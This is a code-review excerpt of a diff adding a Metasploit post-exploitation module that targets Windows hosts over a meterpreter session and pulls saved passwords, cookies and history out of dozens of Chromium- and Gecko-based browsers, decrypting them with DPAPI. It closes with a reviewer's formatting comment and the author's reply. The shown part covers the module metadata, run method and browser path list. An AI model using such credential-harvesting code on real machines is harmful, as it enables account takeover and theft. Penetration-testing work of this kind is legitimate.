modules/post/windows/gather/enum_browsers.rb

```diff
@@ -0,0 +1,411 @@
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Advanced Browser Data Extraction for Chromium and Gecko Browsers',
+        'Description' => %q{
+          This module extracts sensitive browser data such as passwords, cookies, and history from Chromium-based and Gecko-based
+          browsers on the target system. It decrypts passwords using Windows DPAPI, and provides the option to kill the browser
+          processes to ensure data extraction.
+        },
+        'License' => MSF_LICENSE,
+        'Platform' => ['win'],
+        'Arch' => [ ARCH_X64, ARCH_X86 ],
+        'Targets' => [['Windows', {}]],
+        'SessionTypes' => ['meterpreter'],
+        'Author' => ['Alexander "xaitax" Hagenah'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptBool.new('KILL_BROWSER', [false, 'Kill browser processes before extracting data', false]),
+    ])
+  end
+
+  def run
+    if session.type != 'meterpreter'
+      print_error('This module requires a meterpreter session.')
+      return
+    end
+
+    user_profile = get_env('USERPROFILE')
+    user_account = session.sys.config.getuid
+    ip_address = session.sock.peerhost
+
+    if user_profile.nil? || user_profile.empty?
+      print_error('Could not determine the current user profile directory.')
+      return
+    end
+
+    print_status("Targeting: #{user_account} (#{ip_address}).")
+    print_status("Starting data extraction from user profile: #{user_profile}")
+
+    process_chromium_browsers(user_profile)
+    process_gecko_browsers(user_profile)
+  end
+
+  # Browsers and paths taken from https://github.com/shaddy43/BrowserSnatch/
+  def process_chromium_browsers(base_path)
+    chromium_browsers = {
+      'Microsoft\\Edge\\' => 'Microsoft Edge', 'Google\\Chrome\\' => 'Google Chrome', 'Opera Software\\Opera Stable' => 'Opera',
+      'Iridium\\' => 'Iridium', 'Chromium\\' => 'Chromium', 'BraveSoftware\\Brave-Browser\\' => 'Brave',
+      'CentBrowser\\' => 'CentBrowser', 'Chedot\\' => 'Chedot', 'Orbitum\\' => 'Orbitum',
+      'Comodo\\Dragon\\' => 'Comodo Dragon', 'Yandex\\YandexBrowser\\' => 'Yandex Browser', '7Star\\7Star\\' => '7Star',
+      'Torch\\' => 'Torch', 'MapleStudio\\ChromePlus\\' => 'ChromePlus', 'Kometo\\' => 'Komet',
+      'Amigo\\' => 'Amigo', 'Sputnik\\Sputnik\\' => 'Sputnik', 'CatalinaGroup\\Citrio\\' => 'Citrio',
+      '360Chrome\\Chrome\\' => '360Chrome', 'uCozMedia\\Uran\\' => 'Uran', 'liebao\\' => 'Liebao',
+      'Elements Browser\\' => 'Elements Browser', 'Epic Privacy Browser\\' => 'Epic Privacy Browser',
+      'CocCoc\\Browser\\' => 'CocCoc Browser', 'Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer' => 'Sleipnir',
+      'QIP Surf\\' => 'QIP Surf', 'Coowon\\Coowon\\' => 'Coowon', 'Vivaldi\\' => 'Vivaldi'
+    }
```

Comment:
Maybe put one browser per line, to make this more readable.

Reply:
Added in the latest commit! Cheers.